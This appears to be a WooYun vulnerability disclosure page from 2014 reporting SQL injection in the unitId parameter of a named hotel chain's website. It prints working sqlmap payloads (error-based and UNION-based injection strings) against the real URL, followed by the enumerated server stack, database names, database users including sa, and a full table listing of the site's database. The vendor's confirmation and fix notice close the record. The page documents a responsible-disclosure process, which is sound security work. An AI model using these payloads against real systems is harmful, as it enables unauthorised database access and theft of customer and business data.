乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-02-28: 细节已通知厂商并且等待厂商处理中 2014-03-06: 厂商已经确认,细节仅向厂商公开 2014-03-16: 细节向核心白帽子及相关领域专家公开 2014-03-26: 细节向普通白帽子公开 2014-04-05: 细节向实习白帽子公开 2014-04-14: 细节向公众公开
我感觉是重复了
http://www.bestay.com.cn/Web/Chain/HotelComment.aspx?unitId=8097&cityId=
unitId参数过滤不严
Place: GETParameter: unitId Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: unitId=8097' AND 1642=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(104)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (1642=1642) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113)+CHAR(113))) AND 'rIgJ'='rIgJ&cityId=1 Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: unitId=8097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(104)+CHAR(119)+CHAR(113)+CHAR(78)+CHAR(80)+CHAR(70)+CHAR(73)+CHAR(114)+CHAR(111)+CHAR(76)+CHAR(87)+CHAR(103)+CHAR(112)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113)+CHAR(113),NULL,NULL,NULL-- &cityId=1
web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008available databases [5]:[*] JJWEB[*] master[*] model[*] msdb[*] tempdbdatabase management system users [2]:[*] sa[*] WEB-DB-WEB
Database: JJWEB[81 tables]+-------------------------------------+| CDS_UnitRmTp || DN_CodeDescript || DN_District || DN_Unit_20140120 || DN_Unit_20140120 || HT_CRSRmTp || HT_PayAccountInnHotel || HT_ResvApp || HT_UnitInfo || HT_UnitPosition || HT_UnitRmTp || JW_Apply || JW_ApplytoJoin || JW_BrandInfoCate || JW_BrandInfoCate || JW_Bus_XZ_Hotels || JW_Bus_XZ_Hotels || JW_Channels || JW_ChefInfoCate || JW_ChefInfoCate || JW_CityInfo || JW_CityPIOData || JW_Collect || JW_CompanyLinkClass || JW_CompanyLinkClass || JW_CountryList || JW_DataVersion || JW_Department || JW_DiTieXianLu || JW_DownLoad || JW_Education || JW_FormService || JW_Guest_Consultation || JW_Guest_HotelComment || JW_HotelComment || JW_HotelPhoto || JW_InfoPicture || JW_InnHotel_NearInfo || JW_JobCate || JW_JobPosition || JW_LinkCate || JW_Links || JW_MsgStatus || JW_NewsWeiXin || JW_OftenOrderHotel || JW_OftenOrderUser || JW_OperationType || JW_OrderBuyCard || JW_ProInfoCate || JW_ProInfoCate || JW_RecType || JW_ScoreClass || JW_ScoreTrans || JW_ServiceList || JW_SiteMsg || JW_SpecOffsCate || JW_SpecOffsCate || JW_SpecOffsType || JW_SpecialCity_20140115 || JW_SpecialCity_20140115 || JW_SpecialCity_a || JW_StatisticsClass || JW_TuiJian || JW_Unit360Flash_1 || JW_Unit360Flash_1 || JW_UnitMinPrice || JW_UploadFile || JW_UserMsgSite || JW_UserQPlus || JW_WeiXinResv || JW_qykh || MSreplication_objects || MSreplication_subscriptions || MSsavedforeignkeycolumns || MSsavedforeignkeyextendedproperties || MSsavedforeignkeys || MSsnapshotdeliveryprogress || MSsubscription_agents || v_SpecOffs_Info || v_dnunit_htunitinfo || v_hotellist |+-------------------------------------+
过滤!
危害等级:高
漏洞Rank:15
确认时间:2014-03-06 10:23
已确认,正在修复,谢谢
暂无